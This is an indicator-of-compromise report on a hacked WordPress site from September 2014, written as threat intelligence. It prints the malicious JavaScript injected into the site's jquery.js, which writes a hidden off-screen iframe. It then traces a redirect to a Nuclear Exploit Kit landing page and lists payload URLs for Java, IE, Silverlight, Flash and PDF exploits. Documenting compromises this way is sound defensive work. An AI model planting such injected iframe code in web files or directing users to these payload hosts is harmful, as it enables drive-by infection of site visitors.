IOC - www.coffeeandquinoa.com - 2014-09-10

1. // JavaScript at http://www.coffeeandquinoa.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 has the following code injected
2.  
3. document.write('<iframe src="http://fikakuir.zuttoakame.com/giglouiders16.html" width="201" height="201" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 101px;width: 101px;"></iframe>');
4.  
5. // request for 'http://fikakuir.zuttoakame.com/giglouiders16.html' returns 302 response to 'http://digaoplar.nutrimedica.com.br/1550ce7dpwt/1/9ffbf35e4190fbba62f70c8477fa3964.html'
6.  
7. HTTP/1.1 302 Found
8. Server: nginx
9. Date: Wed, 10 Sep 2014 16:39:18 GMT
10. Content-Type: text/html; charset=iso-8859-1
11. Content-Length: 360
12. Location: http://digaoplar.nutrimedica.com.br/1550ce7dpwt/1/9ffbf35e4190fbba62f70c8477fa3964.html
13. Connection: close
14. Set-Cookie:
15.  
16. // 9ffbf35e4190fbba62f70c8477fa3964.html is a landing page for Nuclear Exploit Kit that will attempt to compromise the machine through the following
17.  
18. http://digaoplar.nutrimedica.com.br/2740087946/2/1410359100.jar - Java Exploit
19. http://digaoplar.nutrimedica.com.br/2740087946/2/1410359100.htm - IE Exploit
20. http://digaoplar.nutrimedica.com.br/2740087946/2/1410359100.xap - SilverLight Exploit
21. http://digaoplar.nutrimedica.com.br/2740087946/2/1410359100.swf - Shockwave Flash Player Exploit
22. http://digaoplar.nutrimedica.com.br/2740087946/2/1410359100.pdf - Adobe PDF plugin Exploit